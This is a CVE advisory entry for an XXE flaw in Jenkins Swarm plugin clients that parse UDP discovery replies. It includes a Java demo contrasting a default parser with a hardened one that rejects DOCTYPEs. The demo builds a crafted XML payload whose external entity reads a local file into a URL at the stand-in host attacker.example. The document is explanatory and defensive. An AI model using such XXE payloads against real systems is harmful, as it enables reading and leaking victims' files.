CVE-2019-10309

critical

Description

Jenkins Self-Organizing Swarm Plug-in Modules Plugin clients that use UDP broadcasts to discover Jenkins masters do not disable XML External Entity (XXE) processing when parsing the responses. Because any host on the same broadcast domain can answer a discovery probe, an attacker on that network, without any Jenkins credentials, can return a crafted XML response whose external entities cause the Swarm client to read arbitrary files from its own filesystem.
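The parser misconfiguration behind this bug class, as an added Java example (this is illustrative code, not code from the Swarm plugin, the Jenkins advisory, or the Talos report): a client parses a UDP discovery reply with JAXP defaults, which resolve external general entities, beside a hardened factory that refuses DOCTYPE declarations outright. The <hudson><url> message shape, the secret file and the attacker hostname are constructed for the demo and are not the real discovery protocol; the feature URIs are the standard Xerces/JAXP ones. Needs Java 11 or later for Files.writeString.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

public class SwarmDiscoveryXxe {

    // Hypothetical helper standing in for a careless client: JAXP defaults resolve
    // external entities, so whatever the DTD points at ends up in the document.
    static String parseUnsafe(byte[] response) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        DocumentBuilder b = f.newDocumentBuilder();
        Document d = b.parse(new ByteArrayInputStream(response));
        return d.getDocumentElement().getElementsByTagName("url").item(0).getTextContent();
    }

    // Hardened variant: forbid DOCTYPEs entirely (no place left to declare an entity),
    // and belt-and-braces disable entity/DTD loading in case the first feature is unsupported.
    static String parseHardened(byte[] response) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        DocumentBuilder b = f.newDocumentBuilder();
        Document d = b.parse(new ByteArrayInputStream(response));
        return d.getDocumentElement().getElementsByTagName("url").item(0).getTextContent();
    }

    public static void main(String[] args) throws Exception {
        // Constructed stand-in for a sensitive file on the client host.
        Path secret = Files.createTempFile("swarm-client-secret", ".txt");
        Files.writeString(secret, "client-secret-token");

        // Constructed rogue "discovery response": a host on the broadcast domain answers
        // the client's probe with XML that declares an external entity and places it in
        // an element the client trusts and reuses.
        String malicious =
            "<?xml version=\"1.0\"?>\n" +
            "<!DOCTYPE hudson [\n" +
            "  <!ENTITY xxe SYSTEM \"" + secret.toUri() + "\">\n" +
            "]>\n" +
            "<hudson><url>http://attacker.example/&xxe;</url></hudson>";
        byte[] response = malicious.getBytes(StandardCharsets.UTF_8);

        try {
            // Default parser: the file contents are substituted into the URL value.
            System.out.println("default parser returned: " + parseUnsafe(response));

            // Hardened parser: parsing fails on the DOCTYPE before any entity is touched.
            try {
                parseHardened(response);
                System.out.println("hardened parser accepted the document (unexpected)");
            } catch (SAXParseException e) {
                System.out.println("hardened parser rejected it: " + e.getMessage());
            }
        } finally {
            Files.deleteIfExists(secret);
        }
    }
}
```

Run with java SwarmDiscoveryXxe.java on JDK 11+. The unsafe path prints the temp file's contents embedded in the URL, which is exactly the data a client would go on to use (or send somewhere) without noticing; the hardened path fails fast with a "DOCTYPE is disallowed" SAXParseException. Rejecting DOCTYPEs is the right default for a protocol whose messages never legitimately carry a DTD, and it is the check to look for when auditing any XML consumer that reads from an unauthenticated network source.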

References

https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0783

https://jenkins.io/security/advisory/2019-04-30/#SECURITY-1252

http://www.securityfocus.com/bid/108159

http://www.openwall.com/lists/oss-security/2019/04/30/5

Details

Source: Mitre, NVD

Published: 2019-04-30

Updated: 2026-06-17

Risk Information

CVSS v2

Base Score: 4.8

Vector: CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:P

Severity: Medium

CVSS v3

Base Score: 9.3

Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H

Severity: Critical

EPSS

EPSS: 0.00072